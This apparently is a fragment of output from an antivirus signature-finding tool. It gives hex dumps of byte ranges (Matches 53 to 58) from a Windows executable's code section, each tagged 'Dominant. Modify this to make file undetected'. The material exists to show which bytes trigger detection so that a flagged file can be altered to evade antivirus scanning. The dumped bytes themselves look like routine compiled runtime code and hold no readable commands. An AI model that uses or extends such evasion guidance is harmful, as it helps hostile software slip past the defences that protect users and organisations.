000083D0   33 C0 EB E4 85 DB 75 07 33 C0 66 89 01 EB C8 2B    3.....u.3.f....+
000083E0   D9 8B D1 57 8B F8 83 FE FF 75 16 0F B7 04 13 66    ...W.....u.....f
000083F0   89 02 8D 52 02 66 85 C0 74 2E 83 EF 01 75 EC EB    ...R.f..t....u..
00008400   27 8B CE 0F B7 04 13 66                            '......f

Match 53: 35160 (size: 680)

Dominant. Modify this to make file undetected

.text

00008958   8D 04 98 89 4E 04 89 46 08 33 F6 6A 00 E8 B1 D6    ....N..F.3.j....
00008968   FF FF 59 8B C6 5B 5F 5E C3 8B FF 55 8B EC 5D E9    ..Y..[_^...U..].
00008978   FC FA FF FF 6A 08 68 68 91 41 00 E8 68 8A FF FF    ....j.hh.A..h...
00008988   8B 45 08 FF 30 E8 5A 0D 00 00 59 83 65 FC 00 8B    .E..0.Z...Y.e...
00008998   4D 0C E8 2A 00 00 00 C7 45 FC FE FF FF FF E8 12    M..*....E.......
000089A8   00 00 00 8B 4D F0 64 89 0D 00 00 00 00 59 5F 5E    ....M.d......Y_^
000089B8   5B C9 C2 0C 00 8B 45 10 FF 30 E8 6D 0D 00 00 59    [.....E..0.m...Y
000089C8   C3 8B FF 56 8B F1 B9 01 01 00 00 51 8B 06 8B 00    ...V.......Q....
000089D8   8B 40 48 83 C0 18 50 51 FF 35 3C B2 41 00 E8 F7    .@H...PQ.5<.A...
000089E8   06 00 00 8B 06 B9 00 01 00 00 51 8B 00 8B 40 48    ..........Q...@H
000089F8   05 19 01 00 00 50 51 FF 35 40 B2 41 00 E8 D8 06    .....PQ.5@.A....
00008A08   00 00 8B 46 04 83 C4 20 83 C9 FF 8B 00 8B 00 F0    ...F... ........
00008A18   0F C1 08 75 15 8B 46 04 8B 00 81 38 00 A2 41 00    ...u..F....8..A.
00008A28   74 08 FF 30 E8 EA D5 FF FF 59 8B 06 8B 10 8B 46    t..0.....Y.....F
00008A38   04 8B 08 8B 42 48 89 01 8B 06 8B 00 8B 40 48 F0    ....BH.......@H.
00008A48   FF 00 5E C3 8B FF 55 8B EC 8B 45 08 2D A4 03 00    ..^...U...E.-...
00008A58   00 74 28 83 E8 04 74 1C 83 E8 0D 74 10 83 E8 01    .t(...t....t....
00008A68   74 04 33 C0 5D C3 A1 6C 3D 41 00 5D C3 A1 68 3D    t.3.]..l=A.]..h=
00008A78   41 00 5D C3 A1 64 3D 41 00 5D C3 A1 60 3D 41 00    A.]..d=A.]..`=A.
00008A88   5D C3 8B FF 55 8B EC 83 EC 10 8D 4D F0 6A 00 E8    ]...U......M.j..
00008A98   8A A1 FF FF 83 25 48 B2 41 00 00 8B 45 08 83 F8    .....%H.A...E...
00008AA8   FE 75 12 C7 05 48 B2 41 00 01 00 00 00 FF 15 C4    .u...H.A........
00008AB8   20 41 00 EB 2C 83 F8 FD 75 12 C7 05 48 B2 41 00     A..,...u...H.A.
00008AC8   01 00 00 00 FF 15 C0 20 41 00 EB 15 83 F8 FC 75    ....... A......u
00008AD8   10 8B 45 F4 C7 05 48 B2 41 00 01 00 00 00 8B 40    ..E...H.A......@
00008AE8   08 80 7D FC 00 74 0A 8B 4D F0 83 A1 50 03 00 00    ..}..t..M...P...
00008AF8   FD C9 C3 8B FF 55 8B EC 53 8B 5D 08 56 57 68 01    .....U..S.].VWh.
00008B08   01 00 00 33 FF 8D 73 18 57 56 E8 F9 8D FF FF 89    ...3..s.WV......
00008B18   7B 04 33 C0 89 7B 08 83 C4 0C 89 BB 1C 02 00 00    {.3..{..........
00008B28   B9 01 01 00 00 8D 7B 0C AB AB AB BF 00 A2 41 00    ......{.......A.
00008B38   2B FB 8A 04 37 88 06 46 83 E9 01 75 F5 8D 8B 19    +...7..F...u....
00008B48   01 00 00 BA 00 01 00 00 8A 04 39 88 01 41 83 EA    ..........9..A..
00008B58   01 75 F5 5F 5E 5B 5D C3 8B FF 55 8B EC 81 EC 18    .u._^[]...U.....
00008B68   07 00 00 A1 04 A0 41 00 33 C5 89 45 FC 53 56 8B    ......A.3..E.SV.
00008B78   75 08 57 81 7E 04 E9 FD 00 00 0F 84 0C 01 00 00    u.W.~...........
00008B88   8D 85 E8 F8 FF FF 50 FF 76 04 FF 15 C8 20 41 00    ......P.v.... A.
00008B98   85 C0 0F 84 F4 00 00 00 33 DB BF 00 01 00 00 8B    ........3.......
00008BA8   C3 88 84 05 FC FE FF FF 40 3B C7 72 F4 8A 85 EE    ........@;.r....
00008BB8   F8 FF FF 8D 8D EE F8 FF FF C6 85 FC FE FF FF 20    ............... 
00008BC8   EB 1F 0F B6 51 01 0F B6 C0 EB 0D 3B C7 73 0D C6    ....Q......;.s..
00008BD8   84 05 FC FE FF FF 20 40 3B C2 76 EF 83 C1 02 8A    ...... @;.v.....
00008BE8   01 84 C0 75 DD 53 FF 76 04 8D 85 FC F8 FF FF 50    ...u.S.v.......P
00008BF8   57 8D 85 FC FE FF FF 50                            W......P

Match 54: 35976 (size: 952)

Dominant. Modify this to make file undetected

.text

00008C88   06 19 01 00 00 40 3B C7 72 C4 EB 3D 33 DB BF 00    .....@;.r..=3...
00008C98   01 00 00 8B CB 8D 51 9F 8D 42 20 83 F8 19 77 0A    ......Q..B ...w.
00008CA8   80 4C 0E 19 10 8D 41 20 EB 13 83 FA 19 77 0C 8D    .L....A .....w..
00008CB8   04 0E 80 48 19 20 8D 41 E0 EB 02 8A C3 88 84 0E    ...H. .A........
00008CC8   19 01 00 00 41 3B CF 72 CC 8B 4D FC 5F 5E 33 CD    ....A;.r..M._^3.
00008CD8   5B E8 FB 7D FF FF C9 C3 8B FF 55 8B EC 83 EC 14    [..}......U.....
00008CE8   FF 75 14 FF 75 10 E8 01 01 00 00 FF 75 08 E8 8F    .u..u.......u...
00008CF8   FD FF FF 8B 4D 10 83 C4 0C 89 45 F4 8B 49 48 3B    ....M.....E..IH;
00008D08   41 04 75 04 33 C0 C9 C3 53 56 57 68 20 02 00 00    A.u.3...SVWh ...
00008D18   E8 1A DD FF FF 8B F8 83 CB FF 59 85 FF 74 2E 8B    ..........Y..t..
00008D28   75 10 B9 88 00 00 00 8B 76 48 F3 A5 8B F8 57 FF    u.......vH....W.
00008D38   75 F4 83 27 00 E8 AD 01 00 00 8B F0 59 59 3B F3    u..'........YY;.
00008D48   75 1B E8 5C D2 FF FF C7 00 16 00 00 00 8B F3 57    u..\...........W
00008D58   E8 BE D2 FF FF 59 5F 8B C6 5E 5B C9 C3 80 7D 0C    .....Y_..^[...}.
00008D68   00 75 05 E8 10 C2 FF FF 8B 45 10 8B 40 48 F0 0F    .u.......E..@H..
00008D78   C1 18 4B 75 15 8B 45 10 81 78 48 00 A2 41 00 74    ..Ku..E..xH..A.t
00008D88   09 FF 70 48 E8 8A D2 FF FF 59 C7 07 01 00 00 00    ..pH.....Y......
00008D98   8B CF 8B 45 10 33 FF 89 48 48 8B 4D 10 A1 80 A7    ...E.3..HH.M....
00008DA8   41 00 85 81 50 03 00 00 75 A5 8D 45 10 89 45 EC    A...P...u..E..E.
00008DB8   8D 4D FF 6A 05 8D 45 14 89 45 F0 58 89 45 F4 89    .M.j..E..E.X.E..
00008DC8   45 F8 8D 45 F4 50 8D 45 EC 50 8D 45 F8 50 E8 A1    E..E.P.E.P.E.P..
00008DD8   FB FF FF 80 7D 0C 00 0F 84 72 FF FF FF 8B 45 14    ....}....r....E.
00008DE8   8B 00 A3 F4 A1 41 00 E9 63 FF FF FF 6A 0C 68 48    .....A..c...j.hH
00008DF8   91 41 00 E8 F0 85 FF FF 33 F6 89 75 E4 8B 7D 08    .A......3..u..}.
00008E08   A1 80 A7 41 00 85 87 50 03 00 00 74 0E 39 77 4C    ...A...P...t.9wL
00008E18   74 09 8B 77 48 85 F6 74 6D EB 59 6A 05 E8 C2 08    t..wH..tm.Yj....
00008E28   00 00 59 89 75 FC 8B 77 48 89 75 E4 8B 5D 0C 3B    ..Y.u..wH.u..].;
00008E38   33 74 27 85 F6 74 18 83 C8 FF F0 0F C1 06 75 0F    3t'..t........u.
00008E48   81 FE 00 A2 41 00 74 07 56 E8 C5 D1 FF FF 59 8B    ....A.t.V.....Y.
00008E58   33 89 77 48 89 75 E4 F0 FF 06 C7 45 FC FE FF FF    3.wH.u.....E....
00008E68   FF E8 05 00 00 00 EB AD 8B 75 E4 6A 05 E8 BA 08    .........u.j....
00008E78   00 00 59 C3 8B C6 8B 4D F0 64 89 0D 00 00 00 00    ..Y....M.d......
00008E88   59 5F 5E 5B C9 C3 E8 47 C7 FF FF CC 80 3D 4C B2    Y_^[...G.....=L.
00008E98   41 00 00 75 3C C7 05 44 B2 41 00 00 A2 41 00 C7    A..u<..D.A...A..
00008EA8   05 40 B2 41 00 28 A5 41 00 C7 05 3C B2 41 00 20    .@.A.(.A...<.A. 
00008EB8   A4 41 00 E8 89 E4 FF FF 68 44 B2 41 00 50 6A 01    .A......hD.A.Pj.
00008EC8   6A FD E8 11 FE FF FF 83 C4 10 C6 05 4C B2 41 00    j...........L.A.
00008ED8   01 B0 01 C3 68 44 B2 41 00 E8 A6 E3 FF FF 50 E8    ....hD.A......P.
00008EE8   08 FF FF FF 59 59 C3 8B FF 55 8B EC 83 EC 20 A1    ....YY...U.... .
00008EF8   04 A0 41 00 33 C5 89 45 FC 53 56 8B 75 0C 57 FF    ..A.3..E.SV.u.W.
00008F08   75 08 E8 7B FB FF FF 8B D8 59 85 DB 0F 84 B0 01    u..{.....Y......
00008F18   00 00 33 FF 8B CF 8B C7 89 4D E4 39 98 30 A6 41    ..3......M.9.0.A
00008F28   00 0F 84 F3 00 00 00 41 83 C0 30 89 4D E4 3D F0    .......A..0.M.=.
00008F38   00 00 00 72 E6 81 FB E8 FD 00 00 0F 84 D1 00 00    ...r............
00008F48   00 0F B7 C3 50 FF 15 BC 20 41 00 85 C0 0F 84 BF    ....P... A......
00008F58   00 00 00 B8 E9 FD 00 00 3B D8 75 26 89 46 04 89    ........;.u&.F..
00008F68   BE 1C 02 00 00 89 7E 18 66 89 7E 1C 89 7E 08 33    ......~.f.~..~.3
00008F78   C0 8D 7E 0C AB AB AB 56 E8 DB FB FF FF E9 46 01    ..~....V......F.
00008F88   00 00 8D 45 E8 50 53 FF 15 C8 20 41 00 85 C0 74    ...E.PS... A...t
00008F98   75 68 01 01 00 00 8D 46 18 57 50 E8 68 89 FF FF    uh.....F.WP.h...
00008FA8   83 C4 0C 89 5E 04 83 7D E8 02 89 BE 1C 02 00 00    ....^..}........
00008FB8   75 BA 80 7D EE 00 8D 45 EE 74 21 8A 48 01 84 C9    u..}...E.t!.H...
00008FC8   74 1A 0F B6 D1 0F B6 08 EB 06 80 4C 0E 19 04 41    t..........L...A
00008FD8   3B CA 76 F6 83 C0 02 80 38 00 75 DF 8D 46 1A B9    ;.v.....8.u..F..
00008FE8   FE 00 00 00 80 08 08 40 83 E9 01 75 F7 FF 76 04    .......@...u..v.
00008FF8   E8 4F FA FF FF 33 FF 89 86 1C 02 00 00 83 C4 04    .O...3..........
00009008   47 E9 66 FF FF FF 39 3D 48 B2 41 00 0F 85 B0 00    G.f...9=H.A.....
00009018   00 00 83 C8 FF E9 B1 00 00 00 68 01 01 00 00 8D    ..........h.....
00009028   46 18 57 50 E8 DF 88 FF FF 83 C4 0C 6B 45 E4 30    F.WP........kE.0
00009038   89 45 E0 8D 80 40 A6 41                            .E...@.A

Match 55: 37064 (size: 680)

Dominant. Modify this to make file undetected

.text

000090C8   FF FF 56 E8 2B FA FF FF 33 C0 59 8B 4D FC 5F 5E    ..V.+...3.Y.M._^
000090D8   33 CD 5B E8 F9 79 FF FF C9 C3 8B FF 55 8B EC 56    3.[..y......U..V
000090E8   8B 75 14 85 F6 75 04 33 C0 EB 6D 8B 45 08 85 C0    .u...u.3..m.E...
000090F8   75 13 E8 AC CE FF FF 6A 16 5E 89 30 E8 E5 CD FF    u......j.^.0....
00009108   FF 8B C6 EB 53 57 8B 7D 10 85 FF 74 14 39 75 0C    ....SW.}...t.9u.
00009118   72 0F 56 57 50 E8 9E 8E FF FF 83 C4 0C 33 C0 EB    r.VWP........3..
00009128   36 FF 75 0C 6A 00 50 E8 DC 87 FF FF 83 C4 0C 85    6.u.j.P.........
00009138   FF 75 09 E8 6B CE FF FF 6A 16 EB 0C 39 75 0C 73    .u..k...j...9u.s
00009148   13 E8 5D CE FF FF 6A 22 5E 89 30 E8 96 CD FF FF    ..]...j"^.0.....
00009158   8B C6 EB 03 6A 16 58 5F 5E 5D C3 8B FF 55 8B EC    ....j.X_^]...U..
00009168   8B 45 08 B9 35 C4 00 00 3B C1 77 28 74 65 83 F8    .E..5...;.w(te..
00009178   2A 74 60 3D 2B C4 00 00 76 15 3D 2E C4 00 00 76    *t`=+...v.=....v
00009188   52 3D 31 C4 00 00 74 4B 3D 33 C4 00 00 74 44 8B    R=1...tK=3...tD.
00009198   4D 0C EB 29 3D 98 D6 00 00 74 1C 3D A9 DE 00 00    M..)=....t.=....
000091A8   76 ED 3D B3 DE 00 00 76 2A 3D E8 FD 00 00 74 23    v.=....v*=....t#
000091B8   3D E9 FD 00 00 75 D8 8B 4D 0C 83 E1 08 FF 75 1C    =....u..M.....u.
000091C8   FF 75 18 FF 75 14 FF 75 10 51 50 FF 15 CC 20 41    .u..u..u.QP... A
000091D8   00 5D C3 33 C9 EB E6 8B FF 55 8B EC 8B 45 08 BA    .].3.....U...E..
000091E8   E9 FD 00 00 53 56 57 8D 72 FF 3B C6 74 08 3B C2    ....SVW.r.;.t.;.
000091F8   74 04 32 DB EB 02 B3 01 B9 35 C4 00 00 3B C1 77    t.2......5...;.w
00009208   23 74 49 83 F8 2A 74 44 3D 2B C4 00 00 76 32 3D    #tI..*tD=+...v2=
00009218   2E C4 00 00 76 36 3D 31 C4 00 00 74 2F 3D 33 C4    ....v6=1...t/=3.
00009228   00 00 EB 1B 3D 98 D6 00 00 74 21 3D A9 DE 00 00    ....=....t!=....
00009238   76 0F 3D B3 DE 00 00 76 13 3B C6 74 0F 3B C2 74    v.=....v.;.t.;.t
00009248   0B 8B 4D 0C 81 E1 7F FF FF FF EB 02 33 C9 8B 7D    ..M.........3..}
00009258   24 0F B6 D3 F7 DA 0F B6 F3 1B D2 F7 D2 23 D7 F7    $............#..
00009268   DE 1B F6 F7 D6 23 75 20 84 DB 74 07 85 FF 74 03    .....#u ..t...t.
00009278   83 27 00 52 56 FF 75 1C FF 75 18 FF 75 14 FF 75    .'.RV.u..u..u..u
00009288   10 51 50 FF 15 D0 20 41 00 5F 5E 5B 5D C3 8B FF    .QP... A._^[]...
00009298   55 8B EC 8B 55 08 57 33 FF 66 39 3A 74 21 56 8B    U...U.W3.f9:t!V.
000092A8   CA 8D 71 02 66 8B 01 83 C1 02 66 3B C7 75 F5 2B    ..q.f.....f;.u.+
000092B8   CE D1 F9 8D 14 4A 83 C2 02 66 39 3A 75 E1 5E 8D    .....J...f9:u.^.
000092C8   42 02 5F 5D C3 8B FF 56 57 FF 15 D4 20 41 00 8B    B._]...VW... A..
000092D8   F0 85 F6 75 04 33 FF EB 37 53 56 E8 AE FF FF FF    ...u.3..7SV.....
000092E8   8B D8 2B DE 83 E3 FE 53 E8 42 D7 FF FF 8B F8 59    ..+....S.B.....Y
000092F8   59 85 FF 74 0B 53 56 57 E8 BB 8C FF FF 83 C4 0C    Y..t.SVW........
00009308   6A 00 E8 0C CD FF FF 59 56 FF 15 D8 20 41 00 5B    j......YV... A.[
00009318   8B C7 5F 5E C3 8B FF 55 8B EC 83 EC 10 53 8B 5D    .._^...U.....S.]
00009328   08 85 DB 75 13 E8 79 CC FF FF C7 00 16 00 00 00    ...u..y.........
00009338   83 C8 FF E9 22 02 00 00 56 57 6A 3D 53 8B FB E8    ...."...VWj=S...
00009348   44 7F 00 00 89 45 F4 59 59 85 C0 0F 84 F0 01 00    D....E.YY.......
00009358   00 3B C3 0F 84 E8 01 00 00 0F B7 48 02 8B C1 89    .;.........H....
00009368   45 F0 89 45 F8 E8 BC 02                            E..E....

Match 56: 38560 (size: 1088)

Dominant. Modify this to make file undetected

.text

000096A0   8B FF 55 8B EC 5D E9 72 FC FF FF 8B FF 56 57 BF    ..U..].r.....VW.
000096B0   50 B2 41 00 33 F6 6A 00 68 A0 0F 00 00 57 E8 C6    P.A.3.j.h....W..
000096C0   CC FF FF 85 C0 74 18 FF 05 A0 B3 41 00 83 C6 18    .....t.....A....
000096D0   83 C7 18 81 FE 50 01 00 00 72 DB B0 01 EB 0A 6A    .....P...r.....j
000096E0   00 E8 1D 00 00 00 59 32 C0 5F 5E C3 8B FF 55 8B    ......Y2._^...U.
000096F0   EC 6B 45 08 18 05 50 B2 41 00 50 FF 15 50 20 41    .kE...P.A.P..P A
00009700   00 5D C3 8B FF 56 8B 35 A0 B3 41 00 85 F6 74 20    .]...V.5..A...t 
00009710   6B C6 18 57 8D B8 38 B2 41 00 57 FF 15 58 20 41    k..W..8.A.W..X A
00009720   00 FF 0D A0 B3 41 00 83 EF 18 83 EE 01 75 EB 5F    .....A.......u._
00009730   B0 01 5E C3 8B FF 55 8B EC 6B 45 08 18 05 50 B2    ..^...U..kE...P.
00009740   41 00 50 FF 15 54 20 41 00 5D C3 8B FF 55 8B EC    A.P..T A.]...U..
00009750   51 64 A1 30 00 00 00 56 33 F6 89 75 FC 8B 40 10    Qd.0...V3..u..@.
00009760   39 70 08 7C 0F 8D 45 FC 50 E8 7F CA FF FF 83 7D    9p.|..E.P......}
00009770   FC 01 74 03 33 F6 46 8B C6 5E C9 C3 8B FF 55 8B    ..t.3.F..^....U.
00009780   EC 51 51 53 56 6A 38 6A 40 E8 30 C8 FF FF 8B F0    .QQSVj8j@.0.....
00009790   33 DB 89 75 F8 59 59 85 F6 75 04 8B F3 EB 4B 8D    3..u.YY..u....K.
000097A0   86 00 0E 00 00 3B F0 74 41 57 8D 7E 20 8B F0 53    .....;.tAW.~ ..S
000097B0   68 A0 0F 00 00 8D 47 E0 50 E8 CB CB FF FF 83 4F    h.....G.P......O
000097C0   F8 FF 80 67 0D F8 89 1F 8D 7F 38 89 5F CC 8D 47    ...g......8._..G
000097D0   E0 C7 47 D0 00 00 0A 0A C6 47 D4 0A 89 5F D6 88    ..G......G..._..
000097E0   5F DA 3B C6 75 C9 8B 75 F8 5F 53 E8 2B C8 FF FF    _.;.u..u._S.+...
000097F0   59 8B C6 5E 5B C9 C3 8B FF 55 8B EC 56 8B 75 08    Y..^[....U..V.u.
00009800   85 F6 74 25 53 8D 9E 00 0E 00 00 57 8B FE 3B F3    ..t%S......W..;.
00009810   74 0E 57 FF 15 58 20 41 00 83 C7 38 3B FB 75 F2    t.W..X A...8;.u.
00009820   56 E8 F5 C7 FF FF 59 5F 5B 5E 5D C3 6A 10 68 88    V.....Y_[^].j.h.
00009830   91 41 00 E8 B8 7B FF FF 81 7D 08 00 20 00 00 72    .A...{...}.. ..r
00009840   21 E8 65 C7 FF FF 6A 09 5E 89 30 E8 9E C6 FF FF    !.e...j.^.0.....
00009850   8B C6 8B 4D F0 64 89 0D 00 00 00 00 59 5F 5E 5B    ...M.d......Y_^[
00009860   C9 C3 33 F6 89 75 E4 6A 07 E8 7E FE FF FF 59 89    ..3..u.j..~...Y.
00009870   75 FC 8B FE A1 20 B2 41 00 89 7D E0 39 45 08 7C    u.... .A..}.9E.|
00009880   1F 39 34 BD 20 B0 41 00 75 31 E8 ED FE FF FF 89    .94. .A.u1......
00009890   04 BD 20 B0 41 00 85 C0 75 14 6A 0C 5E 89 75 E4    .. .A...u.j.^.u.
000098A0   C7 45 FC FE FF FF FF E8 15 00 00 00 EB A2 A1 20    .E............. 
000098B0   B2 41 00 83 C0 40 A3 20 B2 41 00 47 EB BB 8B 75    .A...@. .A.G...u
000098C0   E4 6A 07 E8 6C FE FF FF 59 C3 8B FF 55 8B EC 8B    .j..l...Y...U...
000098D0   45 08 8B C8 83 E0 3F C1 F9 06 6B C0 38 03 04 8D    E.....?...k.8...
000098E0   20 B0 41 00 50 FF 15 50 20 41 00 5D C3 8B FF 55     .A.P..P A.]...U
000098F0   8B EC 8B 45 08 8B C8 83 E0 3F C1 F9 06 6B C0 38    ...E.....?...k.8
00009900   03 04 8D 20 B0 41 00 50 FF 15 54 20 41 00 5D C3    ... .A.P..T A.].
00009910   8B FF 55 8B EC 53 56 8B 75 08 57 85 F6 78 67 3B    ..U..SV.u.W..xg;
00009920   35 20 B2 41 00 73 5F 8B C6 8B FE 83 E0 3F C1 FF    5 .A.s_......?..
00009930   06 6B D8 38 8B 04 BD 20 B0 41 00 F6 44 03 28 01    .k.8... .A..D.(.
00009940   74 44 83 7C 03 18 FF 74 3D E8 97 AB FF FF 83 F8    tD.|...t=.......
00009950   01 75 23 33 C0 2B F0 74 14 83 EE 01 74 0A 83 EE    .u#3.+.t....t...
00009960   01 75 13 50 6A F4 EB 08 50 6A F5 EB 03 50 6A F6    .u.Pj...Pj...Pj.
00009970   FF 15 E0 20 41 00 8B 04 BD 20 B0 41 00 83 4C 03    ... A.... .A..L.
00009980   18 FF 33 C0 EB 16 E8 20 C6 FF FF C7 00 09 00 00    ..3.... ........
00009990   00 E8 02 C6 FF FF 83 20 00 83 C8 FF 5F 5E 5B 5D    ....... ...._^[]
000099A0   C3 8B FF 55 8B EC 8B 4D 08 83 F9 FE 75 15 E8 E5    ...U...M....u...
000099B0   C5 FF FF 83 20 00 E8 F0 C5 FF FF C7 00 09 00 00    .... ...........
000099C0   00 EB 43 85 C9 78 27 3B 0D 20 B2 41 00 73 1F 8B    ..C..x';. .A.s..
000099D0   C1 83 E1 3F C1 F8 06 6B C9 38 8B 04 85 20 B0 41    ...?...k.8... .A
000099E0   00 F6 44 08 28 01 74 06 8B 44 08 18 5D C3 E8 A5    ..D.(.t..D..]...
000099F0   C5 FF FF 83 20 00 E8 B0 C5 FF FF C7 00 09 00 00    .... ...........
00009A00   00 E8 E8 C4 FF FF 83 C8 FF 5D C3 83 3D A4 B3 41    .........]..=..A
00009A10   00 00 75 0A C7 05 A4 B3 41 00 00 40 00 00 33 C0    ..u.....A..@..3.
00009A20   C3 8B FF 55 8B EC 56 8B 75 08 85 F6 0F 84 EA 00    ...U..V.u.......
00009A30   00 00 8B 46 0C 3B 05 34 A7 41 00 74 07 50 E8 D8    ...F.;.4.A.t.P..
00009A40   C5 FF FF 59 8B 46 10 3B 05 38 A7 41 00 74 07 50    ...Y.F.;.8.A.t.P
00009A50   E8 C6 C5 FF FF 59 8B 46 14 3B 05 3C A7 41 00 74    .....Y.F.;.<.A.t
00009A60   07 50 E8 B4 C5 FF FF 59 8B 46 18 3B 05 40 A7 41    .P.....Y.F.;.@.A
00009A70   00 74 07 50 E8 A2 C5 FF FF 59 8B 46 1C 3B 05 44    .t.P.....Y.F.;.D
00009A80   A7 41 00 74 07 50 E8 90 C5 FF FF 59 8B 46 20 3B    .A.t.P.....Y.F ;
00009A90   05 48 A7 41 00 74 07 50 E8 7E C5 FF FF 59 8B 46    .H.A.t.P.~...Y.F
00009AA0   24 3B 05 4C A7 41 00 74 07 50 E8 6C C5 FF FF 59    $;.L.A.t.P.l...Y
00009AB0   8B 46 38 3B 05 60 A7 41 00 74 07 50 E8 5A C5 FF    .F8;.`.A.t.P.Z..
00009AC0   FF 59 8B 46 3C 3B 05 64 A7 41 00 74 07 50 E8 48    .Y.F<;.d.A.t.P.H
00009AD0   C5 FF FF 59 8B 46 40 3B 05 68 A7 41 00 74 07 50    ...Y.F@;.h.A.t.P

Match 57: 40192 (size: 816)

Dominant. Modify this to make file undetected

.text

00009D00   EB 33 C0 83 C1 02 66 39 01 75 D5 33 C0 5F 5E 5B    .3....f9.u.3._^[
00009D10   5D C3 8B C1 EB F7 8B FF 55 8B EC 83 EC 1C A1 04    ].......U.......
00009D20   A0 41 00 33 C5 89 45 FC 53 56 57 FF 75 08 8D 4D    .A.3..E.SVW.u..M
00009D30   E4 E8 F0 8E FF FF 8B 5D 1C 85 DB 75 06 8B 45 E8    .......]...u..E.
00009D40   8B 58 08 33 C0 33 FF 39 45 20 57 57 FF 75 14 0F    .X.3.3.9E WW.u..
00009D50   95 C0 FF 75 10 8D 04 C5 01 00 00 00 50 53 E8 00    ...u........PS..
00009D60   F4 FF FF 83 C4 18 89 45 F4 85 C0 0F 84 84 00 00    .......E........
00009D70   00 8D 14 00 8D 4A 08 89 55 F8 3B D1 1B C0 23 C1    .....J..U.;...#.
00009D80   74 35 3D 00 04 00 00 77 13 E8 D2 72 00 00 8B F4    t5=....w...r....
00009D90   85 F6 74 1E C7 06 CC CC 00 00 EB 13 50 E8 95 CC    ..t.........P...
00009DA0   FF FF 8B F0 59 85 F6 74 09 C7 06 DD DD 00 00 83    ....Y..t........
00009DB0   C6 08 8B 55 F8 EB 02 8B F7 85 F6 74 31 52 57 56    ...U.......t1RWV
00009DC0   E8 4B 7B FF FF FF 75 F4 56 FF 75 14 FF 75 10 6A    .K{...u.V.u..u.j
00009DD0   01 53 E8 8C F3 FF FF 83 C4 24 85 C0 74 10 FF 75    .S.......$..t..u
00009DE0   18 50 56 FF 75 0C FF 15 E4 20 41 00 8B F8 56 E8    .PV.u.... A...V.
00009DF0   25 00 00 00 59 80 7D F0 00 74 0A 8B 45 E4 83 A0    %...Y.}..t..E...
00009E00   50 03 00 00 FD 8B C7 8D 65 D8 5F 5E 5B 8B 4D FC    P.......e._^[.M.
00009E10   33 CD E8 C2 6C FF FF C9 C3 8B FF 55 8B EC 8B 45    3...l......U...E
00009E20   08 85 C0 74 12 83 E8 08 81 38 DD DD 00 00 75 07    ...t.....8....u.
00009E30   50 E8 E5 C1 FF FF 59 5D C3 8B FF 55 8B EC 8B 45    P.....Y]...U...E
00009E40   08 F0 FF 40 0C 8B 48 7C 85 C9 74 03 F0 FF 01 8B    ...@..H|..t.....
00009E50   88 84 00 00 00 85 C9 74 03 F0 FF 01 8B 88 80 00    .......t........
00009E60   00 00 85 C9 74 03 F0 FF 01 8B 88 8C 00 00 00 85    ....t...........
00009E70   C9 74 03 F0 FF 01 56 6A 06 8D 48 28 5E 81 79 F8    .t....Vj..H(^.y.
00009E80   F8 A1 41 00 74 09 8B 11 85 D2 74 03 F0 FF 02 83    ..A.t.....t.....
00009E90   79 F4 00 74 0A 8B 51 FC 85 D2 74 03 F0 FF 02 83    y..t..Q...t.....
00009EA0   C1 10 83 EE 01 75 D6 FF B0 9C 00 00 00 E8 4C 01    .....u........L.
00009EB0   00 00 59 5E 5D C3 8B FF 55 8B EC 51 53 56 8B 75    ..Y^]...U..QSV.u
00009EC0   08 57 8B 86 88 00 00 00 85 C0 74 6C 3D 28 A7 41    .W........tl=(.A
00009ED0   00 74 65 8B 46 7C 85 C0 74 5E 83 38 00 75 59 8B    .te.F|..t^.8.uY.
00009EE0   86 84 00 00 00 85 C0 74 18 83 38 00 75 13 50 E8    .......t..8.u.P.
00009EF0   27 C1 FF FF FF B6 88 00 00 00 E8 22 FB FF FF 59    '.........."...Y
00009F00   59 8B 86 80 00 00 00 85 C0 74 18 83 38 00 75 13    Y........t..8.u.
00009F10   50 E8 05 C1 FF FF FF B6 88 00 00 00 E8 FE FB FF    P...............
00009F20   FF 59 59 FF 76 7C E8 F0 C0 FF FF FF B6 88 00 00    .YY.v|..........
00009F30   00 E8 E5 C0 FF FF 59 59 8B 86 8C 00 00 00 85 C0    ......YY........
00009F40   74 45 83 38 00 75 40 8B 86 90 00 00 00 2D FE 00    tE.8.u@......-..
00009F50   00 00 50 E8 C3 C0 FF FF 8B 86 94 00 00 00 BF 80    ..P.............
00009F60   00 00 00 2B C7 50 E8 B0 C0 FF FF 8B 86 98 00 00    ...+.P..........
00009F70   00 2B C7 50 E8 A2 C0 FF FF FF B6 8C 00 00 00 E8    .+.P............
00009F80   97 C0 FF FF 83 C4 10 FF B6 9C 00 00 00 E8 95 00    ................
00009F90   00 00 59 6A 06 58 8D 9E A0 00 00 00 89 45 FC 8D    ..Yj.X.......E..
00009FA0   7E 28 81 7F F8 F8 A1 41 00 74 1D 8B 07 85 C0 74    ~(.....A.t.....t
00009FB0   14 83 38 00 75 0F 50 E8 5F C0 FF FF FF 33 E8 58    ..8.u.P._....3.X
00009FC0   C0 FF FF 59 59 8B 45 FC 83 7F F4 00 74 16 8B 47    ...YY.E.....t..G
00009FD0   FC 85 C0 74 0C 83 38 00 75 07 50 E8 3B C0 FF FF    ...t..8.u.P.;...
00009FE0   59 8B 45 FC 83 C3 04 83 C7 10 83 E8 01 89 45 FC    Y.E...........E.
00009FF0   75 B0 56 E8 23 C0 FF FF 59 5F 5E 5B C9 C3 8B FF    u.V.#...Y_^[....
0000A000   55 8B EC 8B 4D 08 85 C9 74 16 81 F9 A0 38 41 00    U...M...t....8A.
0000A010   74 0E 33 C0 40 F0 0F C1 81 B0 00 00 00 40 5D C3    t.3.@........@].
0000A020   B8 FF FF FF 7F 5D C3 8B FF 55 8B EC 56 8B 75 08    .....]...U..V.u.

Match 58: 41280 (size: 544)

Dominant. Modify this to make file undetected

.text

0000A140   57 E8 3D 00 00 00 59 59 8B F0 89 75 E4 C7 45 FC    W.=...YY...u..E.
0000A150   FE FF FF FF E8 09 00 00 00 85 F6 74 20 EB 0C 8B    ...........t ...
0000A160   75 E4 6A 04 E8 CB F5 FF FF 59 C3 8B C6 8B 4D F0    u.j......Y....M.
0000A170   64 89 0D 00 00 00 00 59 5F 5E 5B C9 C3 E8 58 B4    d......Y_^[...X.
0000A180   FF FF CC 8B FF 55 8B EC 56 8B 75 0C 57 85 F6 74    .....U..V.u.W..t
0000A190   3C 8B 45 08 85 C0 74 35 8B 38 3B FE 75 04 8B C6    <.E...t5.8;.u...
0000A1A0   EB 2D 56 89 30 E8 8F FC FF FF 59 85 FF 74 EF 57    .-V.0.....Y..t.W
